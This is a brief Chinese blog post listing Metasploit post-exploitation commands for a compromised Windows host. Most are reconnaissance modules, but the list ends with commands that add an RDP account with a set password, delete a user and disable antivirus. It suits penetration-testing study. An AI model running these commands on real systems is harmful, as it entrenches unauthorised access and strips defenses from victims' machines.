博客
关于我
Metasploit -- 后渗透模块(POST)
阅读量:311 次
发布时间:2019-03-03

本文共 649 字,大约阅读时间需要 2 分钟。

​给时间一点时间,让过去过去,让开始开始。。。

----  网易云热评

作用:获取目标主机后shell后,继续信息收集,提权

1、获取目标分区情况

run post/windows/gather/forensics/enum_drives

2、检测是否是虚拟主机

run post/windows/gather/checkvm

3、获取当前安装的应用程序

run post/windows/gather/enum_applications

4、获取用户登录信息

run post/windows/gather/enum_logged_on_users

5、对目标进行漏洞扫描

run post/multi/recon/local_exploit_suggester

6、收集系统环境信息

run post/multi/gather/env

7、查看开启的服务

run post/windows/gather/enum_services

8、查看目标主机最近的操作

run post/windows/gather/dumplinks

 

9、其他操作

删除用户

run post/wndows/manage/delete_user username=aiyou

添加账户

run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou

关闭杀软

windows/manage/killav

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

转载地址:http://ovnl.baihongyu.com/

你可能感兴趣的文章
MySQL中interactive_timeout和wait_timeout的区别
查看>>
mysql中int、bigint、smallint 和 tinyint的区别、char和varchar的区别详细介绍
查看>>
mysql中json_extract的使用方法
查看>>
mysql中json_extract的使用方法
查看>>
mysql中kill掉所有锁表的进程
查看>>
mysql中like % %模糊查询
查看>>
MySql中mvcc学习记录
查看>>
mysql中null和空字符串的区别与问题!
查看>>